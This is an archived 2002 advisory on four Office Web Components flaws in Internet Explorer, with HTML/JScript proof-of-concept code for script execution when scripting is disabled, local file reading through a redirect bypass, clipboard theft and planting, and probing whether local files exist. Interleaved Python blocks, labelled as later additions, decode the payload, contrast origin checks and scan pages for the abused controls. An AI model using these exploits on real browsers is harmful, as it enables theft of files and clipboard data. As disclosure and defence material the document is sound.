26th Sep 2002 [SBWID-5254]
COMMAND
	Multiple vulnerabilities via Office Web Components / IE
SYSTEMS AFFECTED
	 IE5sp2 NT4 sp6a + Office 2000 (OWC9), all patches.
	 IE5.5sp2 NT4 sp6a + Office 2000 (OWC9), all patches.
	 IE6 Win2000 + Office 2000 (OWC9), all patches.
	 IE5.5sp2 NT4 sp6a + OWC10, all patches.
	 IE6sp1 Win2000 + OWC10, all patches.
	 IE6 WinXP + Office XP (OWC10), all patches.
	 IE6sp1 WinXP + Office XP (OWC10), all patches.
PROBLEM
	In GreyMagic Security [http://security.greymagic.com] advisories
	[GM#005-IE] [GM#006-IE] [GM#007-IE] [GM#008-IE], the GreyMagic security
	team disclosed multiple vulnerabilities in Office Web Components:
	 Introduction:
	 =============
	Office Web Components (OWC) is a group of safe-for-scripting components
	used to enrich HTML documents with spreadsheets, charts, pivot tables
	and more.
	OWC ships with the Microsoft Office package, but it is also
	downloadable as a separate (free for viewing only) component.
	
	 Vulnerability N°1 : Scripting for the scriptless
	 ================================================
	
	Office XP introduced OWC10, which added many interesting features. One
	of the features added to the Spreadsheet component is the "=HOST()"
	formula, which returns a handle to the hosting environment.
	It is possible to use this formula to manipulate the DOM, which is a
	security issue in itself when Active Scripting is disabled, but it is
	somewhat limited because there is no way to add logic (conditions,
	loops, etc.) to the calls made.
	However, with a bit of manipulation it is possible to get Active
	Scripting to kick in. By using the setTimeout method of the window
	object through the "=HOST()" formula it is possible to execute script
	in any language available to the host (IE).
	 Exploit:
	 ========
	This example will display a message box even when scripting is
	disabled; it contains many quotes because several levels of escaping
	are needed:
	
	<object classid="clsid:0002E551-0000-0000-C000-000000000046"
	style="display:none">
	    <param
	        name="csvdata"
	        value='"=HOST().parentWindow.setTimeout(""var i=20; alert(i+""""+3 equals """"+(i+3));"",10,""jscript"")"'
	    >
	</object>
	
	See : [http://security.greymagic.com/adv/gm005-ie/]
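	To see why the csvdata value above needs so many quotes, this added Python (not part of the advisory, and not OWC code) peels off the two escaping layers, the CSV quoting of the csvdata field and the doubled quotes inside the formula's string literals, and returns the script text that setTimeout would receive. The value is copied from the advisory; the small formula tokenizer is an assumption about how the component splits the call's arguments, written only to illustrate the layering.

```python
import csv

# Copy of the advisory's csvdata value (the text between the single quotes
# of the value='...' attribute), embedded so the block runs offline.
CSVDATA = ('"=HOST().parentWindow.setTimeout(""var i=20; alert(i+""""+3 equals '
           '""""+(i+3));"",10,""jscript"")"')

def csv_unescape(field):
    """Layer 1: the component parses csvdata as CSV, so a quoted field drops
    its outer quotes and every "" inside it becomes a single quote."""
    return next(csv.reader([field]))[0]

def call_args(formula, method):
    """Layer 2 (assumed tokenizer): return the argument list of method(...)
    in the formula, collapsing "" inside a formula string literal to one."""
    i = formula.index(method + "(") + len(method) + 1
    args, cur, in_str = [], "", False
    while i < len(formula):
        c = formula[i]
        if in_str:
            if c == '"' and formula[i + 1:i + 2] == '"':   # "" -> "
                cur += '"'
                i += 1
            elif c == '"':
                in_str = False                            # literal closed
            else:
                cur += c
        elif c == '"':
            in_str = True
        elif c in ",)":
            args.append(cur)
            cur = ""
            if c == ")":
                break
        elif not c.isspace():
            cur += c
        i += 1
    return args

def decode_host_payload(csvdata, method="setTimeout"):
    """Unwrap both layers and report what the host's setTimeout is handed."""
    formula = csv_unescape(csvdata)
    script, delay, lang = call_args(formula, method)
    return {"formula": formula, "script": script,
            "delay_ms": int(delay), "language": lang}
```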
	
	 Vulnerability N°2 : Reading local files
	 =======================================
	
	Using the Spreadsheet component in both OWC9 and OWC10, it is possible
	to read any local or remote file.
	The "LoadText" method of the Range object takes a URL as its first
	argument; it throws an error if the URL supplied is not in the same
	domain as the current document.
	However, this protection can be easily bypassed by supplying a URL that
	redirects to the desired local or remote file.
	OWC is fooled into thinking that the URL is safe and loads the contents
	of the file into the spreadsheet; it is then trivial to retrieve the
	content and transfer it to the server or use it in malicious ways.
	 Exploit:
	 ========
	This example reads the contents of the file "c:/test.txt"; the URL
	"getFile.asp" redirects to "file://c:/test.txt", allowing us to
	access it:
	
	<object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP"
	style="display:none"></object>
	<script language="jscript">
	onload=function () {
	    try {
	        // Load file into spreadsheet
	        oSP.ActiveSheet.UsedRange.LoadText("getFile.asp");
	        // Read the spreadsheet
	        var oRng=oSP.ActiveSheet.UsedRange,
	            iRows=oRng.Rows.Count,
	            iCols=oRng.Columns.Count,
	            sRes="";
	        for (var iCRow=1;iCRow<=iRows;iCRow++) {
	            for (var iCCol=1;iCCol<=iCols;iCCol++) {
	                sRes+=(oSP.Cells(iCRow,iCCol).Value || "")+"\t";
	            }
	            sRes+="\n";
	        }
	        // Display result
	        alert(sRes);
	    }
	    catch (oErr) {
	        // Failed
	        alert("File not found.");
	    }
	}
	</script>
	
	The class id of the <object> element above is for the spreadsheet
	component of OWC9 (Microsoft Office 2000); OWC10's class id is
	"0002E551-0000-0000-C000-000000000046", and no further changes to the
	code are needed.
	An attacker can actually use the fallback feature of the <object>
	element to include either one of these components:
	
	<!-- Try to include OWC10 -->
	<object classid="clsid:0002E551-0000-0000-C000-000000000046" id="oSP10"
	style="display:none">
	    <!-- Failed, try to include OWC9 -->
	    <object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP9"
	style="display:none">
	        <!-- None found -->
	        Failed to load any of the spreadsheet components.
	    </object>
	</object>
	
	See : [http://security.greymagic.com/adv/gm006-ie/]
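	The LoadText bypass works because the same-domain check looks only at the URL as supplied, not at where the redirect lands. This added Python (not from the advisory or from OWC) contrasts that weak check with one that validates every hop of the fetch; the hostnames and the redirect table standing in for "getFile.asp" are constructed.

```python
from urllib.parse import urlparse

# Constructed redirect table standing in for the advisory's "getFile.asp",
# which answers with a redirect to file://c:/test.txt. Hostnames are made up.
REDIRECTS = {
    "http://attacker.example/getFile.asp": "file://c:/test.txt",
    "http://attacker.example/hop.asp": "http://attacker.example/getFile.asp",
}

def same_origin(url, document_url):
    """Scheme and host (with port) must match the hosting document."""
    a, b = urlparse(url), urlparse(document_url)
    return (a.scheme.lower(), a.netloc.lower()) == \
           (b.scheme.lower(), b.netloc.lower())

def resolve(url, max_hops=5):
    """Return every URL a fetch of url would touch, following the constructed
    redirect table; max_hops cuts off a redirect loop."""
    chain = [url]
    while chain[-1] in REDIRECTS and len(chain) <= max_hops:
        chain.append(REDIRECTS[chain[-1]])
    return chain

def weak_load_allowed(url, document_url):
    """The check the advisory describes: only the supplied URL is compared,
    so a same-origin redirector pointing at a file: URL passes."""
    return same_origin(url, document_url)

def hardened_load_allowed(url, document_url):
    """Apply the origin check to every hop, including the final target, so a
    redirect to file: or to another host is refused."""
    return all(same_origin(u, document_url) for u in resolve(url))
```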
	
	 Vulnerability N°3 : Controlling the clipboard
	 =============================================
	
	It is well documented that IE lets anybody read and write clipboard
	data by default; until now it was possible to disable this feature by
	setting "Allow paste operations via script" to "Disable".
	It is now possible to gain control over the clipboard even when it is
	disabled in the security zone, via the Spreadsheet component in both
	OWC9 and OWC10.
	The "Paste" method of the Range object and the "Copy" method of the
	Cell object both give an attacker full control over clipboard
	operations.
	The attacker can continuously monitor the victim's clipboard and log
	the findings to a server for later inspection. It is also possible for
	an attacker to place data inside the clipboard.
	 Exploit:
	 ========
	Reading the contents of the clipboard:
	
	<object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP"
	style="display:none"></object>
	<script language="jscript">
	onload=function () {
	    // Paste to spreadsheet
	    oSP.ActiveSheet.UsedRange.Paste();
	    // Read the spreadsheet
	    var oRng=oSP.ActiveSheet.UsedRange,
	        iRows=oRng.Rows.Count,
	        iCols=oRng.Columns.Count,
	        sRes="";
	    for (var iCRow=1;iCRow<=iRows;iCRow++) {
	        for (var iCCol=1;iCCol<=iCols;iCCol++) {
	            sRes+=(oSP.Cells(iCRow,iCCol).Value || "")+"\t";
	        }
	        sRes+="\n";
	    }
	    // Display result
	    alert(sRes);
	}
	</script>
	
	Assigning the clipboard's content:
	
	<object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP"
	style="display:none"></object>
	<script language="jscript">
	onload=function () {
	    oSP.Cells(1,1).Value="Trustworthy computing";
	    oSP.Cells(1,1).Copy();
	}
	</script>
	
	The class id of the <object> element above is for the spreadsheet
	component of OWC9 (Microsoft Office 2000); OWC10's class id is
	"0002E551-0000-0000-C000-000000000046", and no further changes to the
	code are needed.
	An attacker can actually use the fallback feature of the <object>
	element to include either one of these components:
	
	<!-- Try to include OWC10 -->
	<object classid="clsid:0002E551-0000-0000-C000-000000000046" id="oSP10"
	style="display:none">
	    <!-- Failed, try to include OWC9 -->
	    <object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP9"
	style="display:none">
	        <!-- None found -->
	        Failed to load any of the spreadsheet components.
	    </object>
	</object>
	
	See : [http://security.greymagic.com/adv/gm007-ie/]
	
	 Vulnerability N°4 : Multiple local files detection
	 ==================================================
	
	There are several ways to check whether local files exist using OWC9
	and OWC10.
	The first vulnerability is in the Chart component in both OWC9 and
	OWC10. The "Load" method does not perform any security check on the
	assigned URL and throws an error when given a file name that does not
	exist; if no error is thrown, the file exists.
	The second vulnerability is in the Spreadsheet component in OWC10. The
	"XMLURL" property blindly follows redirections, so it is possible to
	assign it a URL which redirects to a local file and determine whether
	it exists or not from the error thrown. It is also possible to read
	properly formatted WorkSheet XML files from disallowed locations in the
	same way.
	The third vulnerability is in the DataSourceControl component in OWC10.
	The "ConnectionFile" property does not perform any security checks on
	the assigned URL. Therefore, it is possible to assign a local file and
	determine whether it exists or not from the error thrown.
	 Exploit:
	 ========
	A simple exploit for the first vulnerability:
	
	<object id="oCS" classid="clsid:0002E500-0000-0000-C000-000000000046"
	style="display:none"></object>
	<!-- For OWC10 the clsid is "0002E556-0000-0000-C000-000000000046" -->
	<script language="jscript">
	onload=function () {
	    try {
	        oCS.Load("file://c:/test.txt");
	        alert("File exists!");
	    }
	    catch (oErr) {
	        alert("File does not exist.");
	    }
	}
	</script>
	
	A simple exploit for the second vulnerability; "getFile.asp" internally
	redirects to "file://c:/test.txt":
	
	<object id="oSP" classid="clsid:0002E551-0000-0000-C000-000000000046"
	style="display:block"></object>
	<script language="jscript">
	onload=function () {
	    try {
	        oSP.XMLURL="getFile.asp";
	    }
	    catch (oErr) {
	        alert(oErr.description.indexOf("valid path")==-1 ? "File exists!" : "File does not exist.");
	    }
	}
	</script>
	
	A simple exploit for the third vulnerability:
	
	<object id="oDS" classid="clsid:0002E553-0000-0000-C000-000000000046"
	style="display:block"></object>
	<script language="jscript">
	onload=function () {
	    try {
	        oDS.ConnectionFile="file://c:/test.txt";
	    }
	    catch (oErr) {
	        alert(oErr.number==-2146697211 ? "File does not exist." : "File exists!");
	    }
	}
	</script>
	
	See : [http://security.greymagic.com/adv/gm008-ie/]
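	All four issues share the same shape: a page instantiates one of the OWC controls by class id and then reaches for a particular member ("=HOST()", LoadText, Paste/Copy, Load, XMLURL, ConnectionFile). The following added Python (not part of the advisory) is a simple triage scanner a defender could run over saved HTML to surface that combination; the class ids and member names come from the advisory, the sample documents are constructed.

```python
import re

# OWC class ids quoted in the advisory, keyed to the component they load.
OWC_CLSIDS = {
    "0002E510-0000-0000-C000-000000000046": "OWC9 Spreadsheet",
    "0002E551-0000-0000-C000-000000000046": "OWC10 Spreadsheet",
    "0002E500-0000-0000-C000-000000000046": "OWC9 Chart",
    "0002E556-0000-0000-C000-000000000046": "OWC10 Chart",
    "0002E553-0000-0000-C000-000000000046": "OWC10 DataSourceControl",
}
CLSID_RE = re.compile(r'classid\s*=\s*["\']?clsid:([0-9A-F-]{36})', re.I)
# The "=HOST()" formula and the members the advisory shows being abused.
ABUSE_RE = re.compile(
    r'=HOST\(\)|\.LoadText\s*\(|\.XMLURL\s*=|\.ConnectionFile\s*=|'
    r'\.Paste\s*\(|\.Copy\s*\(|\.Load\s*\(', re.I)

def scan_html(html):
    """Report which OWC controls a document instantiates and which of the
    advisory's members it touches; flag it only when both are present."""
    comps = sorted({OWC_CLSIDS[m.upper()] for m in CLSID_RE.findall(html)
                    if m.upper() in OWC_CLSIDS})
    members = sorted({re.sub(r"\s+", "", m) for m in ABUSE_RE.findall(html)})
    return {"components": comps, "members": members,
            "suspicious": bool(comps) and bool(members)}

# Constructed sample documents, modelled on the advisory's exploit shapes.
SAMPLES = {
    "host_formula": ('<object classid="clsid:0002E551-0000-0000-C000-000000000046">'
                     '<param name="csvdata" value=\'"=HOST().parentWindow"\'>'
                     '</object>'),
    "clipboard": ('<object classid="clsid:0002E510-0000-0000-C000-000000000046"'
                  ' id="oSP"></object>'
                  '<script>oSP.ActiveSheet.UsedRange.Paste();</script>'),
    "benign": ('<object classid="clsid:0002E510-0000-0000-C000-000000000046">'
               '</object><p>Quarterly figures</p>'),
}

if __name__ == "__main__":
    for name, html in SAMPLES.items():
        print(name, scan_html(html))
```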
SOLUTION
	Set "Run ActiveX controls and plug-ins" to "Disable", or simply
	remove/disable OWC until a patch becomes available.
	No patches yet.